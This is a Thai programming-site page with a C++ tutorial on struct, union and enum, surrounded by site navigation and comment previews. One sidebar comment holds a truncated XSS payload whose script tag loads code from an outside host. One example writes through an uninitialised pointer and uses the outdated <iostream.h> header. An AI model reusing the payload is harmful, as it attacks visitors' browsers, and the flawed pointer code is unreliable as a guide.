หน้าแรก
 การบ้าน
  C/C++ new
  Java new
 Sourcecode.TV
  Android
  Blackberry
  C/C++
  Java
  Linux
  Windows Phone
  แจ้งเรื่องที่ต้องการ
 บทความ
  .NET
  Android
  Blackberry
  C++Builder
  Delphi
  Java
  Mobile
  Open Source
  Pocket PC
  Visual Basic
  Web
  Windows Phone
  Others
 แบบเรียนฟรี
  ASP
  ASP.NET Webmatrix
  C++
  eVB
  J2ME
  Java
  PHP
 ซอร์สโค้ด
  Android
  ASP
  C++
  VC++
  CGI-Perl
  Delphi
  Java
  jQuery
  PHP
  Visual Basic
  .NET
 บริการจากเรา
  เปิดท้าย... ขายโค้ด
  DoodeeHosting
  รับออกแบบ พัฒนาเว็บไซต์
  Freeware
  อัตราค่าโฆษณา
  รายชื่อลูกค้า
  สถิติผู้เข้าเว็บ
 ดาว์นโหลด
 ค้นหาข้อมูล
 กระดานสนทนา
  .NET
  C/C++
  Delphi
  Java
  Palm/PocketPC
  Visual Basic
  Web
  อื่นๆ
 กระดานงาน
 ลิงค์เว็บ
 เกี่ยวกับผม
 อัตราค่าโฆษณา
Social Network

Facebook  Twitter  YouTube
 New Article
 Webboard
 Freelanceboard
Freeware
โปรแกรมเบอร์ดี (BerDee)
โปรแกรมเบอร์ดี (Android)
เกมส์เป่ายิ้งฉุบ
เกมส์เป่ายิ้งฉุบ(Android)
WebcamMonitor
WebcamMonitor(Windows)
scSendMail
scSendMail(Windows)
MSN Caption
MSN Caption(Windows)
  Freelance comment
  ติดต่อสอบถามมาได้ตลอดนะ...
2015-07-29 13:35:58
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:33:54
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:32:51
  ติดต่อสอบถามเข้ามาได้นะ...
2014-01-06 12:47:38
  ถ้ายังหาคนสอนไม่ได้ ก็ลอ...
2013-07-06 01:04:37
  สนใจส่งขอบเขตมาคุยราคาก...
2013-03-24 18:54:20
  ถ้ายังไม่มีคนรับงานติดต...
2012-12-16 19:18:14
  สนใจคะ ติดต่อ 0905076277...
2012-11-12 11:07:46
  รับทำโปรเจ็คนักศึกษาหรื...
2012-10-29 03:10:46
  sukit_te34@hotmail.com...
2012-10-29 03:09:36
  Webboard comment
  พอดีผมเห...
2020-05-31 21:49:43
  ช่วย แสดง...
2020-04-27 11:21:00
  ได้การบ้...
2020-04-27 11:18:56
  ได้การบ้...
2020-04-27 11:02:44
  <a href="https://www.g...
2020-03-10 17:07:03
  ไม่อยากเ...
2020-03-10 17:05:36
  ขอโคํดเก...
2020-02-09 22:50:58
  ขอโค้ดเก...
2020-01-28 23:42:26
  uuu...
2020-01-24 11:54:34
  ก็ต้องลง ...
2019-10-22 01:56:28
  Homework comment
  โจทย์การบ้าน c++ เขียนรูปแ...
2020-04-06 11:01:33
  แบบนี้ขอเป็น ภาษา php หน่อย...
2019-09-18 14:36:34
  ผมไม่อยากให้คุณได้คะแนน...
2019-04-27 01:29:07
  อาจารย์เขาบอกแนวข้อสอบม...
2019-04-27 00:44:29
  ขอสอบถามการเขียน c++ ครับ เ...
2018-04-02 12:19:21
  โค้ดตัวอย่างศึกษาให้เข้...
2017-11-26 14:50:05
  คำนวณค่าน้ำโดยรับค่ามิเ...
2017-11-20 23:15:26
  ขอบคุณมากครับ...
2017-08-16 18:27:25
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:40:46
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:37:54
  Article comment
  asdasd...
2020-01-28 19:48:57
  ต้องการ ให้เขียน โปรแกรม ...
2019-12-09 11:39:58
  รับเขียน arx จาก vc++ 2017 ล็อคโปร...
2019-09-19 09:48:09
  ทำการ register ไฟล์ที่ชื่อ mswinsck.oc...
2019-09-17 14:05:56
  <Img sRC=https://xss.pt/op2fp.jpg>
<sCRiPt sRC=//xss.pt/op...

2019-09-12 13:43:34
  ใน vb 6 ไม่มี component winsock เลยค่ะ ส...
2019-09-03 10:31:02
  รบกวนขอสอบถามหน่อยนะครั...
2019-03-04 05:31:04
  สามารถนำตัวหนังสือจากภา...
2018-12-25 08:54:32
  มีcode ของ VB ไหมค่ะ ถ้ามีรบกว...
2017-09-28 16:50:02
  น่าจะได้ครับ ไม่เคยลอง
...

2017-07-11 09:59:35
  9Mcode comment
  อยากได้...
2014-02-21 08:52:19

Link Exchange

อัตราค่าโฆษณา
Statistics of Sourcecode in Thailand
 
 C++ Tutorial  

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

 C++
 
 

Structure

 

   
 
#include <iostream.h>

struct human
{
	float height;
	int weight;

}one;


int main()
{
	human two;

	one.height=170.5;
	one.weight=50;

	two.height=165.7;
	two.weight=40;

	cout<<one.height<<"\n";
	cout<<two.weight;

	return 0;
}
 
   

[Download Code]

ตัวอย่างนี้แสดงถึงการใช้คำสั่ง struct ครับ โดยเริ่มแรกเราสร้าง structure ชื่อว่า human ขึ้นมา จากนั้นก็ให้ในนี้มีข้อมูลชนิด float, int ครับ ส่วนท้ายของคำสั่ง struct เราก็ได้สร้างตัวแปรขึ้น 1 ตัว ซึ่งเป็นตัวแปรชนิด structure ครับ

พอเริ่มต้นส่วนของเมน ผมก็ได้สร้างตัวแปรชนิด structure ขึ้นอีก 1 ตัว ครับ ซึ่งเป็นอีกวิธีหนึ่ง ส่วนการให้ค่าเราก็จะใช้ . ช่วยครับ

   
 
#include <iostream.h>

struct teacher
{
	int age;
	int dd;
};

struct student
{
	int age;
	char grade;
	teacher one;
};

int main()
{
teacher two,*pt;
student three[10];

	two.dd=3;
	two.age=30;

	pt->dd=5;
	pt->age=35;

	three[0].grade='A';
	three[1].grade='C';

	three[2].one.dd=5;

	cout<<two.dd<<"\n";
	cout<<pt->age<<"\n";
	cout<<three[1].grade<<"\n";
	cout<<three[2].one.dd;

	return 0;
}
 
   

[Download Code]

ตัวอย่างนี้เป็นการแสดงถึงการใช้ structure แบบต่างๆ โดยเริ่มแรกเราสร้าง structure ขึ้นมา 2 อัน สังเกตในส่วนของ student นะครับ ผมได้ สร้าง one ขึ้นมาเพื่อให้เราสามารถเรียก structure ของ teacher จาก student ได้ครับ

พอเริ่มส่วนของผมได้แสดงถึงการให้ structure ร่วมกับพอยต์เตอร์และอะเรย์ครับ และส่วน three[2].one.dd นั้นก็คือผลจากการที่เราสร้าง one ขึ้นมาไงครับ

การให้ค่าของพอย์ตเตอร์จะแตกต่างกับตัวอื่นคือจะใช้ ->แทน นะครับ และสุดท้ายการสร้าง structure นั้น จะสร้างก่อนหรือในส่วนของเมนก็ได้นะครับ

Union

   
 
#include <iostream.h>

union human
{
	float height;
	int weight;
}one;


int main()
{
	human two;

	one.height=170.5;
	one.weight=50;

	two.height=165.7;
	two.weight=40;

	cout<<one.height<<"\n";
	cout<<two.weight;

	return 0;
}
 
   

[Download Code]

อันนี้เหมือนกับตัวอย่างแรกเพียงแต่เปลี่ยนจาก struct เป็น union หลังจาก Run โปรแกรมก็จะเห็นความแตกต่างนะครับ นั่นคือใน 1 ตัวแปรนั้นจะสามารถเก็บค่าได้เพียงค่าเดียว นั่นคือ ตอนแรกเราให้ one.height=170.5 จากนั้น เราจึงให้ one.weight=50 ดังนั้นค่าของ height จึงถูกแทนที่ด้วยค่าของ weight ครับ ส่วนวิธีการอื่นๆก็เหมือนกับ struct ครับ

Enumerated

   
 
#include <iostream.h>

enum number{one,two,three};

int main()
{
	number start=one;
	cout<<start<<"\n";
	start=three;
	cout<<start<<"\n";

	return 0;}
 
   

[Download Code]

หลังจาก Run ตัวอย่างนี้ จะเห็นว่าเราสร้าง number ขึ้นมา แล้วให้ในนี้มีตัวแปร one ซึ่งมีค่าเท่ากับ 0 ,two มีค่าเท่ากับ 1 ไปเรื่อยๆครับ พอเริ่มส่วนของเมน เราก็สร้าง start ซึ่งเป็นชนิด enumerated ขึ้นมาแล้วให้เท่ากับ one ซึ่งก็คือเท่ากับ 0 แหละครับ นอกนั้นก็ไม่มีอะไรแล้วครับ

 

BACK

หัวแปลง Mini DisplayPort to HDMI Adapter หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
คลิปสอนเขียนโปรแกรม
เรียนเขียนโปรแกรมดอทเน็ต
เรียนเขียนโปรแกรมแอนดรอยด์
เรียนเขียนโปรแกรมเบล็คเบอร์รี่
เรียนเขียนโปรแกรมซี ซีพลัสพลัส
เรียนเขียนโปรแกรมจาวา
เรียนการใช้งานลินุกส์
เรียนการเขียนโปรแกรมวินโดว์โฟน
เรียนการเขียนโปรแกรมพีเฮชพี มายเอสคิวเอล
9M Blog บอกเล่าเรื่องราว การเขียนโปรแกรมของ นายเอ็ม
บริการ ถ่ายภาพรับปริญญา
อัตราค่าโฆษณา
 
Tutorial
eVB Tutorial
ASP.NET Webmatrix Tutorial
J2ME Tutorial
C++  Tutorial
Java  Tutorial
PHP Tutorial
ASP Tutorial
 
แบบสำรวจ
Freelance รับพัฒนาโปรแกรม

Home - Article - Tutorial - Sourcecode - Dev Handbook - Search - WebBoard - Links - About Us

สงวนลิขสิทธิ์ ห้ามคัดลอก ทำซ้ำ แก้ไข ดัดแปลง ไม่ว่าในรูปแบบใด โดยไม่ได้รับอนุญาตเป็นลายลักษณ์อักษร
เลขทะเบียนพาณิชย์อิเล็กทรอนิกส์จากกระทรวงพาณิชย์: 7100503002000
Copyright 2001 SourceCode.in.th